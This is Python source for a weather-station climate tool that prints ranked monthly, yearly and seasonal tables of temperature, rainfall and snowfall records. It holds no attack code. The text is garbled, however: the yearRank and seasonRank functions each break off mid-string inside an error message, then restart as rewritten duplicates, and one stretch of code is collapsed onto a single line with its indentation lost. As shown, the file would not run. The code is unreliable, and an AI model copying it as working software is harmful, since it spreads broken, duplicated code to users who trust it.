                        MONTHS_prcpDAYS_asc[x].number if l <= qty else "",
                        m if m not in ranked_m and m <= qty else "",
                        "." if m not in ranked_m and m <= qty else " ",
                        MONTHS_snow[x].year if m <= qty else "",
                        "{:.1f}".format(MONTHS_snow[x].number) if m <= qty else "",
                        n if n not in ranked_n and n <= qty else "",
                        "." if n not in ranked_n and n <= qty else " ",
                        MONTHS_snowDAYS[x].year if n <= qty else "",
                        MONTHS_snowDAYS[x].number if n <= qty else ""))
                if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break
    if attribute == "temp":
        print("{:^111}".format("Ranked {} Monthly Temperatures".format(calendar.month_name[mo])))
        print("{:^111}".format("{}, {}".format(clmt["station"],clmt["station_name"])))
        print("{:^111}".format("Months with >= {} Day(s) of Data".format(excludemonth+1)))
        print("{:-^111}".format(""))
        print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN"))
        print("{:-^36}|{:-^37}|{:-^36}".format("","",""))
        print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest"))
        print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","",""))
        i = 1; j = 1; k = 1; l = 1; m = 1; n = 1
        ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = []
        for x in range(len(MONTHS_tmax)):
            if x == 0:
                print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format(
                    1,".",MONTHS_tavg[x].year,"{:.1f}".format(MONTHS_tavg[x].number),
                    1,".",MONTHS_tavg_asc[x].year,"{:.1f}".format(MONTHS_tavg_asc[x].number),
                    1,".",MONTHS_tmax[x].year,"{:.1f}".format(MONTHS_tmax[x].number),
                    1,".",MONTHS_tmax_asc[x].year,"{:.1f}".format(MONTHS_tmax_asc[x].number),
                    1,".",MONTHS_tmin[x].year,"{:.1f}".format(MONTHS_tmin[x].number),
                    1,".",MONTHS_tmin_asc[x].year,"{:.1f}".format(MONTHS_tmin_asc[x].number)))
                ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n)
            else:
                if i not in ranked_i and i <= qty: ranked_i.append(i)
                if j not in ranked_j and j <= qty: ranked_j.append(j)
                if k not in ranked_k and k <= qty: ranked_k.append(k)
                if l not in ranked_l and l <= qty: ranked_l.append(l)
                if m not in ranked_m and m <= qty: ranked_m.append(m)
                if n not in ranked_n and n <= qty: ranked_n.append(n)
                if MONTHS_tavg[x].number != MONTHS_tavg[x-1].number: i += 1
                if MONTHS_tavg_asc[x].number != MONTHS_tavg_asc[x-1].number: j += 1
                if MONTHS_tmax[x].number != MONTHS_tmax[x-1].number: k += 1
                if MONTHS_tmax_asc[x].number != MONTHS_tmax_asc[x-1].number: l += 1
                if MONTHS_tmin[x].number != MONTHS_tmin[x-1].number: m += 1
                if MONTHS_tmin_asc[x].number != MONTHS_tmin_asc[x-1].number: n += 1
                if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty:
                    print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format(
                        i if i not in ranked_i and i <= qty else "",
                        "." if i not in ranked_i and i <= qty else " ",
                        MONTHS_tavg[x].year if i <= qty else "",
                        "{:.1f}".format(MONTHS_tavg[x].number) if i <= qty else "",
                        j if j not in ranked_j and j <= qty else "",
                        "." if j not in ranked_j and j <= qty else " ",
                        MONTHS_tavg_asc[x].year if j <= qty else "",
                        "{:.1f}".format(MONTHS_tavg_asc[x].number) if j <= qty else "",
                        k if k not in ranked_k and k <= qty else "",
                        "." if k not in ranked_k and k <= qty else " ",
                        MONTHS_tmax[x].year if k <= qty else "",
                        "{:.1f}".format(MONTHS_tmax[x].number) if k <= qty else "",
                        l if l not in ranked_l and l <= qty else "",
                        "." if l not in ranked_l and l <= qty else " ",
                        MONTHS_tmax_asc[x].year if l <= qty else "",
                        "{:.1f}".format(MONTHS_tmax_asc[x].number) if l <= qty else "",
                        m if m not in ranked_m and m <= qty else "",
                        "." if m not in ranked_m and m <= qty else " ",
                        MONTHS_tmin[x].year if m <= qty else "",
                        "{:.1f}".format(MONTHS_tmin[x].number) if m <= qty else "",
                        n if n not in ranked_n and n <= qty else "",
                        "." if n not in ranked_n and n <= qty else " ",
                        MONTHS_tmin_asc[x].year if n <= qty else "",
                        "{:.1f}".format(MONTHS_tmin_asc[x].number) if n <= qty else ""))
                if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break
    print("")

def yearRank(attribute,qty,**kwargs):
    """Returns a list of rankings (maxs and mins) for all years on record.
    It only accepts arguments for the kind of stats ("prcp" or "temps")
    desired, and how many rankings you want to list (ie, top 10; 15; etc).
    The attribute MUST be in string format, while the quantity MUST be an
    integer.

    yearRank(attribute,quantity)

    EXAMPLE: yearRank("temp",15) -> Returns the "Top 15" Temperature-based Rankings for all calendar years on record

    * The kwargs option is not available to the user. it is used internally by yearStats
    """
    # Tiny record type pairing a year with its aggregated value.
    class month_attr:
        def __init__(self,y,number):
            self.year = y
            self.number = number
    if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!")
    if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! 
def yearRank(attribute,qty,**kwargs):
    """Print ranked maxima/minima for all calendar years on record.

    Parameters
    ----------
    attribute : str
        Which table to print. Any of the "temp" family
        ("temp","temps","temperature","temperatures","tmax","tmin","tavg")
        or the "prcp" family ("prcp","precip","rain","snow").
    qty : int
        How many ranks to list; must be an integer in [5, 50].
    **kwargs
        Internal use only (called by yearStats): yearStatsRun=True makes the
        function return sorted value histograms instead of printing a table.

    EXAMPLE: yearRank("temp",15) -> prints the "Top 15" temperature-based
    rankings for all calendar years on record.
    """

    # Lightweight (year, value) record used for sorting/ranking.
    class month_attr:
        def __init__(self,y,number):
            self.year = y          # calendar year the value belongs to
            self.number = number   # the stat value for that year

    # ---- argument validation ------------------------------------------------
    if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]:
        return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!")
    if type(qty) != int or qty > 50 or qty < 5:
        return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]")
    # Collapse accepted aliases down to the two canonical attribute names.
    if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp"
    if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp"

    YEARS_prcp = []
    YEARS_prcp_asc = []
    YEARS_prcpDAYS = []
    YEARS_prcpDAYS_asc = []
    YEARS_snow = []
    YEARS_snow_asc = []
    YEARS_snowDAYS = []
    YEARS_snowDAYS_asc = []
    YEARS_tavg = []
    YEARS_tmax = []
    YEARS_tmin = []

    # ---- harvest one record per year from the module-level climate dict -----
    for y in [YR for YR in clmt if type(YR) == int]:
        try:
            YEARS_prcp.append(month_attr(y,round(sum(clmt[y]["prcp"]),2)))
            YEARS_prcpDAYS.append(month_attr(y,clmt[y]["prcpDAYS"]))
            # Ascending ("driest"/"least days") lists only admit years with
            # more than `excludeyear` days of data, so sparse years cannot
            # masquerade as record minima.
            if clmt[y]["recordqty"] > excludeyear:
                YEARS_prcp_asc.append(month_attr(y,round(sum(clmt[y]["prcp"]),2)))
                YEARS_prcpDAYS_asc.append(month_attr(y,clmt[y]["prcpDAYS"]))
            YEARS_snow.append(month_attr(y,round(sum(clmt[y]["snow"]),1)))
            if clmt[y]["recordqty"] > excludeyear:
                YEARS_snow_asc.append(month_attr(y,round(sum(clmt[y]["snow"]),1)))
            YEARS_snowDAYS.append(month_attr(y,clmt[y]["snowDAYS"]))
            if clmt[y]["recordqty"] > excludeyear:
                YEARS_snowDAYS_asc.append(month_attr(y,clmt[y]["snowDAYS"]))
        except Exception:
            pass  # best-effort: skip years with missing precip/snow fields
        try:
            if len(clmt[y]["tempAVGlist"]) > excludeyear_tavg:
                YEARS_tavg.append(month_attr(y,round(mean(clmt[y]["tempAVGlist"]),1)))
        except Exception:
            pass
        try:
            if len(clmt[y]["tmax"]) > excludeyear:
                YEARS_tmax.append(month_attr(y,round(mean(clmt[y]["tmax"]),1)))
        except Exception:
            pass
        try:
            if len(clmt[y]["tmin"]) > excludeyear:
                YEARS_tmin.append(month_attr(y,round(mean(clmt[y]["tmin"]),1)))
        except Exception:
            pass

    # ---- sort: descending lists give records, ascending give anti-records ---
    YEARS_prcp.sort(key=lambda x:x.number,reverse=True)
    YEARS_prcp_asc.sort(key=lambda x:x.number)
    YEARS_prcpDAYS.sort(key=lambda x:x.number,reverse=True)
    YEARS_prcpDAYS_asc.sort(key=lambda x:x.number)
    YEARS_snow.sort(key=lambda x:x.number,reverse=True)
    YEARS_snow_asc.sort(key=lambda x:x.number)
    YEARS_snowDAYS.sort(key=lambda x:x.number,reverse=True)
    YEARS_snowDAYS_asc.sort(key=lambda x:x.number)
    YEARS_tavg_asc = YEARS_tavg.copy()
    YEARS_tavg.sort(key=lambda x:x.number,reverse=True)
    YEARS_tavg_asc.sort(key=lambda x:x.number)
    YEARS_tmax_asc = YEARS_tmax.copy()
    YEARS_tmax.sort(key=lambda x:x.number,reverse=True)
    YEARS_tmax_asc.sort(key=lambda x:x.number)
    YEARS_tmin_asc = YEARS_tmin.copy()
    YEARS_tmin.sort(key=lambda x:x.number,reverse=True)
    YEARS_tmin_asc.sort(key=lambda x:x.number)

    if "yearStatsRun" in kwargs and kwargs["yearStatsRun"] == True:
        # Internal path for yearStats: return de-duplicated, sorted value
        # histograms instead of printing a table.
        prcpaschist = sorted(list(set([x.number for x in YEARS_prcp_asc])))
        prcpdeschist = sorted(list(set([x.number for x in YEARS_prcp])),reverse=True)
        prcpDAYSaschist = sorted(list(set([x.number for x in YEARS_prcpDAYS_asc])))
        prcpDAYSdeschist = sorted(list(set([x.number for x in YEARS_prcpDAYS])),reverse=True)
        snowaschist = sorted(list(set([x.number for x in YEARS_snow_asc])))
        snowdeschist = sorted(list(set([x.number for x in YEARS_snow])),reverse=True)
        snowDAYSaschist = sorted(list(set([x.number for x in YEARS_snowDAYS_asc])))
        snowDAYSdeschist = sorted(list(set([x.number for x in YEARS_snowDAYS])),reverse=True)
        tmaxaschist = sorted(list(set([x.number for x in YEARS_tmax_asc])))
        tmaxdeschist = sorted(list(set([x.number for x in YEARS_tmax])),reverse=True)
        tminaschist = sorted(list(set([x.number for x in YEARS_tmin_asc])))
        tmindeschist = sorted(list(set([x.number for x in YEARS_tmin])),reverse=True)
        tavgaschist = sorted(list(set([x.number for x in YEARS_tavg_asc])))
        tavgdeschist = sorted(list(set([x.number for x in YEARS_tavg])),reverse=True)
        return prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist
    else:
        print("")
        if attribute == "prcp":
            print("{:^103}".format("Ranked Yearly Precipitation Amounts and Days"))
            print("{:^103}".format("{}, {}".format(clmt["station"],clmt["station_name"])))
            print("{:^103}".format("Years with >= {} day(s) of data".format(excludeyear+1)))
            print("{:-^103}".format(""))
            print("{:^69}|{:^33}".format("Rain","Snow"))
            print("{:-^69}|{:-^33}".format("",""))
            print("{:^18}|{:^18}|{:^15}|{:^15}|{:^17}|{:^15}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days"))
            print("{:-^18}|{:-^18}|{:-^15}|{:-^15}|{:-^17}|{:-^15}".format("","","","","",""))
            # i..n track the current rank in each of the six columns; the
            # ranked_* lists remember ranks already labeled, so tied rows
            # print the rank number only once.
            i = 1;j = 1;k = 1;l = 1;m = 1;n = 1
            ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = []
            for x in range(min(len(YEARS_prcp),len(YEARS_prcp_asc),len(YEARS_prcpDAYS_asc),len(YEARS_prcpDAYS),len(YEARS_snow),len(YEARS_snowDAYS))):
                if x == 0:
                    # First row: every column shows its #1 record (snow
                    # columns stay blank when the top value is zero).
                    print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format(
                        1,".",YEARS_prcp[x].year,"{:.2f}".format(YEARS_prcp[x].number),
                        1,".",YEARS_prcp_asc[x].year,"{:.2f}".format(YEARS_prcp_asc[x].number),
                        1,".",YEARS_prcpDAYS[x].year,YEARS_prcpDAYS[x].number,
                        1,".",YEARS_prcpDAYS_asc[x].year,YEARS_prcpDAYS_asc[x].number,
                        1 if YEARS_snow[x].number > 0 else "","." if YEARS_snow[x].number > 0 else " ",
                        YEARS_snow[x].year if YEARS_snow[x].number > 0 else "","{:.1f}".format(YEARS_snow[x].number) if YEARS_snow[x].number > 0 else "",
                        1 if YEARS_snowDAYS[x].number > 0 else "","." if YEARS_snowDAYS[x].number > 0 else " ",
                        YEARS_snowDAYS[x].year if YEARS_snowDAYS[x].number > 0 else "",YEARS_snowDAYS[x].number if YEARS_snowDAYS[x].number > 0 else ""))
                    ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n)
                else:
                    if i not in ranked_i and i <= qty: ranked_i.append(i)
                    if j not in ranked_j and j <= qty: ranked_j.append(j)
                    if k not in ranked_k and k <= qty: ranked_k.append(k)
                    if l not in ranked_l and l <= qty: ranked_l.append(l)
                    if m not in ranked_m and m <= qty: ranked_m.append(m)
                    if n not in ranked_n and n <= qty: ranked_n.append(n)
                    # Advance a column's rank only when its value changed
                    # (tied values share one rank).
                    if YEARS_prcp[x].number != YEARS_prcp[x-1].number: i += 1
                    if YEARS_prcp_asc[x].number != YEARS_prcp_asc[x-1].number: j += 1
                    if YEARS_prcpDAYS[x].number != YEARS_prcpDAYS[x-1].number: k += 1
                    if YEARS_prcpDAYS_asc[x].number != YEARS_prcpDAYS_asc[x-1].number: l += 1
                    if YEARS_snow[x].number != YEARS_snow[x-1].number: m += 1
                    if YEARS_snowDAYS[x].number != YEARS_snowDAYS[x-1].number: n += 1
                    # Hitting zero ends a descending column early.
                    if YEARS_prcp[x].number == 0: i = qty + 1
                    if YEARS_prcpDAYS[x].number == 0: k = qty + 1
                    if YEARS_snow[x].number == 0: m = qty + 1
                    if YEARS_snowDAYS[x].number == 0: n = qty + 1
                    if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty:
                        print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format(
                            i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ",
                            YEARS_prcp[x].year if i <= qty else "","{:.2f}".format(YEARS_prcp[x].number) if i <= qty else "",
                            j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ",
                            YEARS_prcp_asc[x].year if j <= qty else "","{:.2f}".format(YEARS_prcp_asc[x].number) if j <= qty else "",
                            k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ",
                            YEARS_prcpDAYS[x].year if k <= qty else "",YEARS_prcpDAYS[x].number if k <= qty else "",
                            l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ",
                            YEARS_prcpDAYS_asc[x].year if l <= qty else "",YEARS_prcpDAYS_asc[x].number if l <= qty else "",
                            m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ",
                            YEARS_snow[x].year if m <= qty else "","{:.1f}".format(YEARS_snow[x].number) if m <= qty else "",
                            n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ",
                            YEARS_snowDAYS[x].year if n <= qty else "",YEARS_snowDAYS[x].number if n <= qty else ""))
                # Stop once every column has printed its top `qty` ranks.
                if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty:
                    break
        if attribute == "temp":
            print("{:^111}".format("Ranked Yearly Temperatures"))
            print("{:^111}".format("{}, {}".format(clmt["station"],clmt["station_name"])))
            print("{:^111}".format("Years with >= {} day(s) of data".format(excludeyear+1)))
            print("{:-^111}".format(""))
            print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN"))
            print("{:-^36}|{:-^37}|{:-^36}".format("","",""))
            print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest"))
            print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","",""))
            i = 1; j = 1; k = 1; l = 1; m = 1; n = 1
            ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = []
            for x in range(len(YEARS_tmax)):
                if x == 0:
                    print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format(
                        1,".",YEARS_tavg[x].year,"{:.1f}".format(YEARS_tavg[x].number),
                        1,".",YEARS_tavg_asc[x].year,"{:.1f}".format(YEARS_tavg_asc[x].number),
                        1,".",YEARS_tmax[x].year,"{:.1f}".format(YEARS_tmax[x].number),
                        1,".",YEARS_tmax_asc[x].year,"{:.1f}".format(YEARS_tmax_asc[x].number),
                        1,".",YEARS_tmin[x].year,"{:.1f}".format(YEARS_tmin[x].number),
                        1,".",YEARS_tmin_asc[x].year,"{:.1f}".format(YEARS_tmin_asc[x].number)))
                    ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n)
                else:
                    if i not in ranked_i and i <= qty: ranked_i.append(i)
                    if j not in ranked_j and j <= qty: ranked_j.append(j)
                    if k not in ranked_k and k <= qty: ranked_k.append(k)
                    if l not in ranked_l and l <= qty: ranked_l.append(l)
                    if m not in ranked_m and m <= qty: ranked_m.append(m)
                    if n not in ranked_n and n <= qty: ranked_n.append(n)
                    if YEARS_tavg[x].number != YEARS_tavg[x-1].number: i += 1
                    if YEARS_tavg_asc[x].number != YEARS_tavg_asc[x-1].number: j += 1
                    if YEARS_tmax[x].number != YEARS_tmax[x-1].number: k += 1
                    if YEARS_tmax_asc[x].number != YEARS_tmax_asc[x-1].number: l += 1
                    if YEARS_tmin[x].number != YEARS_tmin[x-1].number: m += 1
                    if YEARS_tmin_asc[x].number != YEARS_tmin_asc[x-1].number: n += 1
                    if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty:
                        print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format(
                            i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ",
                            YEARS_tavg[x].year if i <= qty else "","{:.1f}".format(YEARS_tavg[x].number) if i <= qty else "",
                            j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ",
                            YEARS_tavg_asc[x].year if j <= qty else "","{:.1f}".format(YEARS_tavg_asc[x].number) if j <= qty else "",
                            k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ",
                            YEARS_tmax[x].year if k <= qty else "","{:.1f}".format(YEARS_tmax[x].number) if k <= qty else "",
                            l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ",
                            YEARS_tmax_asc[x].year if l <= qty else "","{:.1f}".format(YEARS_tmax_asc[x].number) if l <= qty else "",
                            m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ",
                            YEARS_tmin[x].year if m <= qty else "","{:.1f}".format(YEARS_tmin[x].number) if m <= qty else "",
                            n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ",
                            YEARS_tmin_asc[x].year if n <= qty else "","{:.1f}".format(YEARS_tmin_asc[x].number) if n <= qty else ""))
                if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty:
                    break
        print("")
if m not in ranked_m and m <= qty else " ", YEARS_tmin[x].year if m <= qty else "","{:.1f}".format(YEARS_tmin[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", YEARS_tmin_asc[x].year if n <= qty else "","{:.1f}".format(YEARS_tmin_asc[x].number) if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break print("") def seasonRank(season,attribute,qty,**kwargs): """Returns a list of rankings (maxs and mins) for all specified meteorological seasons on record. The season ("spring", "summer", "fall", "winter") and attribute ("prcp" or "temp") must be in string format. The quantity, denoting how many rankings you desire, must be an integer. seasonRank(season,attribute,quantity) EXAMPLE: seasonRank("Spring","temp",5) -> Returns the "Top 5" Temperature- based Rankings for all Meteorological Springs on record """ class month_attr: def __init__(self,y,number): self.year = y self.number = number if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! 
def seasonRank(season,attribute,qty,**kwargs):
    """Print ranked maxima/minima for one meteorological season across all years.

    Parameters
    ----------
    season : str
        Which meteorological season to rank ("spring", "summer", "fall",
        "winter"). Used directly as a key into metclmt[year] — NOTE(review):
        no validation is done here; an unrecognized season silently yields an
        empty table. Confirm the exact key casing against how metclmt is built.
    attribute : str
        Which table to print. Any of the "temp" family
        ("temp","temps","temperature","temperatures","tmax","tmin","tavg")
        or the "prcp" family ("prcp","precip","rain","snow").
    qty : int
        How many ranks to list; must be an integer in [5, 50].
    **kwargs
        Internal use only: seasonStatsRun=True makes the function return
        sorted value histograms instead of printing a table.

    EXAMPLE: seasonRank("Spring","temp",5) -> prints the "Top 5" temperature-
    based rankings for all meteorological springs on record.
    """

    # Lightweight (year, value) record used for sorting/ranking.
    class month_attr:
        def __init__(self,y,number):
            self.year = y          # calendar year the season falls in
            self.number = number   # the stat value for that season

    # ---- argument validation ------------------------------------------------
    if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]:
        return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!")
    if type(qty) != int or qty > 50 or qty < 5:
        return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]")
    # Collapse accepted aliases down to the two canonical attribute names.
    if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp"
    if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp"

    SEASON_prcp = []
    SEASON_prcp_asc = []
    SEASON_prcpDAYS = []
    SEASON_prcpDAYS_asc = []
    SEASON_snow = []
    SEASON_snow_asc = []
    SEASON_snowDAYS = []
    SEASON_snowDAYS_asc = []
    SEASON_tavg = []
    SEASON_tmax = []
    SEASON_tmin = []

    # ---- harvest one record per year from the meteorological-season dict ----
    for y in [YR for YR in metclmt if type(YR) == int]:
        try:
            SEASON_prcp.append(month_attr(y,round(sum(metclmt[y][season]["prcp"]),2)))
            SEASON_prcpDAYS.append(month_attr(y,metclmt[y][season]["prcpDAYS"]))
            # Ascending ("driest"/"least days") lists only admit seasons with
            # more than `excludeseason` days of data, so sparse seasons cannot
            # masquerade as record minima.
            if metclmt[y][season]["recordqty"] > excludeseason:
                SEASON_prcp_asc.append(month_attr(y,round(sum(metclmt[y][season]["prcp"]),2)))
                SEASON_prcpDAYS_asc.append(month_attr(y,metclmt[y][season]["prcpDAYS"]))
            SEASON_snow.append(month_attr(y,round(sum(metclmt[y][season]["snow"]),1)))
            if metclmt[y][season]["recordqty"] > excludeseason:
                SEASON_snow_asc.append(month_attr(y,round(sum(metclmt[y][season]["snow"]),1)))
            SEASON_snowDAYS.append(month_attr(y,metclmt[y][season]["snowDAYS"]))
            if metclmt[y][season]["recordqty"] > excludeseason:
                SEASON_snowDAYS_asc.append(month_attr(y,metclmt[y][season]["snowDAYS"]))
        except Exception:
            pass  # best-effort: skip years with missing precip/snow fields
        try:
            if len(metclmt[y][season]["tempAVGlist"]) > excludeseason_tavg:
                SEASON_tavg.append(month_attr(y,round(mean(metclmt[y][season]["tempAVGlist"]),1)))
        except Exception:
            pass
        try:
            if len(metclmt[y][season]["tmax"]) > excludeseason:
                SEASON_tmax.append(month_attr(y,round(mean(metclmt[y][season]["tmax"]),1)))
        except Exception:
            pass
        try:
            if len(metclmt[y][season]["tmin"]) > excludeseason:
                SEASON_tmin.append(month_attr(y,round(mean(metclmt[y][season]["tmin"]),1)))
        except Exception:
            pass

    # ---- sort: descending lists give records, ascending give anti-records ---
    SEASON_prcp.sort(key=lambda x:x.number,reverse=True)
    SEASON_prcp_asc.sort(key=lambda x:x.number)
    SEASON_prcpDAYS.sort(key=lambda x:x.number,reverse=True)
    SEASON_prcpDAYS_asc.sort(key=lambda x:x.number)
    SEASON_snow.sort(key=lambda x:x.number,reverse=True)
    SEASON_snow_asc.sort(key=lambda x:x.number)
    SEASON_snowDAYS.sort(key=lambda x:x.number,reverse=True)
    SEASON_snowDAYS_asc.sort(key=lambda x:x.number)
    SEASON_tavg_asc = SEASON_tavg.copy()
    SEASON_tavg.sort(key=lambda x:x.number,reverse=True)
    SEASON_tavg_asc.sort(key=lambda x:x.number)
    SEASON_tmax_asc = SEASON_tmax.copy()
    SEASON_tmax.sort(key=lambda x:x.number,reverse=True)
    SEASON_tmax_asc.sort(key=lambda x:x.number)
    SEASON_tmin_asc = SEASON_tmin.copy()
    SEASON_tmin.sort(key=lambda x:x.number,reverse=True)
    SEASON_tmin_asc.sort(key=lambda x:x.number)

    if "seasonStatsRun" in kwargs and kwargs["seasonStatsRun"] == True:
        # Internal path for seasonStats: return de-duplicated, sorted value
        # histograms instead of printing a table.
        prcpaschist = sorted(list(set([x.number for x in SEASON_prcp_asc])))
        prcpdeschist = sorted(list(set([x.number for x in SEASON_prcp])),reverse=True)
        prcpDAYSaschist = sorted(list(set([x.number for x in SEASON_prcpDAYS_asc])))
        prcpDAYSdeschist = sorted(list(set([x.number for x in SEASON_prcpDAYS])),reverse=True)
        snowaschist = sorted(list(set([x.number for x in SEASON_snow_asc])))
        snowdeschist = sorted(list(set([x.number for x in SEASON_snow])),reverse=True)
        snowDAYSaschist = sorted(list(set([x.number for x in SEASON_snowDAYS_asc])))
        snowDAYSdeschist = sorted(list(set([x.number for x in SEASON_snowDAYS])),reverse=True)
        tmaxaschist = sorted(list(set([x.number for x in SEASON_tmax_asc])))
        tmaxdeschist = sorted(list(set([x.number for x in SEASON_tmax])),reverse=True)
        tminaschist = sorted(list(set([x.number for x in SEASON_tmin_asc])))
        tmindeschist = sorted(list(set([x.number for x in SEASON_tmin])),reverse=True)
        tavgaschist = sorted(list(set([x.number for x in SEASON_tavg_asc])))
        tavgdeschist = sorted(list(set([x.number for x in SEASON_tavg])),reverse=True)
        return prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist
    else:
        print("")
        if attribute == "prcp":
            print("{:^103}".format("Meteorological {} Ranked Precipitation Amounts and Days".format(season.capitalize())))
            print("{:^103}".format("{}, {}".format(metclmt["station"],metclmt["station_name"])))
            print("{:^103}".format("Seasons with >= {} day(s) of data".format(excludeseason+1)))
            print("{:-^103}".format(""))
            print("{:^69}|{:^33}".format("Rain","Snow"))
            print("{:-^69}|{:-^33}".format("",""))
            print("{:^18}|{:^18}|{:^15}|{:^15}|{:^17}|{:^15}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days"))
            print("{:-^18}|{:-^18}|{:-^15}|{:-^15}|{:-^17}|{:-^15}".format("","","","","",""))
            # i..n track the current rank in each of the six columns; the
            # ranked_* lists remember ranks already labeled, so tied rows
            # print the rank number only once.
            i = 1;j = 1;k = 1;l = 1;m = 1;n = 1
            ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = []
            for x in range(min(len(SEASON_prcp),len(SEASON_prcp_asc),len(SEASON_prcpDAYS_asc),len(SEASON_prcpDAYS),len(SEASON_snow),len(SEASON_snowDAYS))):
                if x == 0:
                    # First row: every column shows its #1 record (snow
                    # columns stay blank when the top value is zero).
                    print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format(
                        1,".",SEASON_prcp[x].year,"{:.2f}".format(SEASON_prcp[x].number),
                        1,".",SEASON_prcp_asc[x].year,"{:.2f}".format(SEASON_prcp_asc[x].number),
                        1,".",SEASON_prcpDAYS[x].year,SEASON_prcpDAYS[x].number,
                        1,".",SEASON_prcpDAYS_asc[x].year,SEASON_prcpDAYS_asc[x].number,
                        1 if SEASON_snow[x].number > 0 else "","." if SEASON_snow[x].number > 0 else " ",
                        SEASON_snow[x].year if SEASON_snow[x].number > 0 else "","{:.1f}".format(SEASON_snow[x].number) if SEASON_snow[x].number > 0 else "",
                        1 if SEASON_snowDAYS[x].number > 0 else "","." if SEASON_snowDAYS[x].number > 0 else " ",
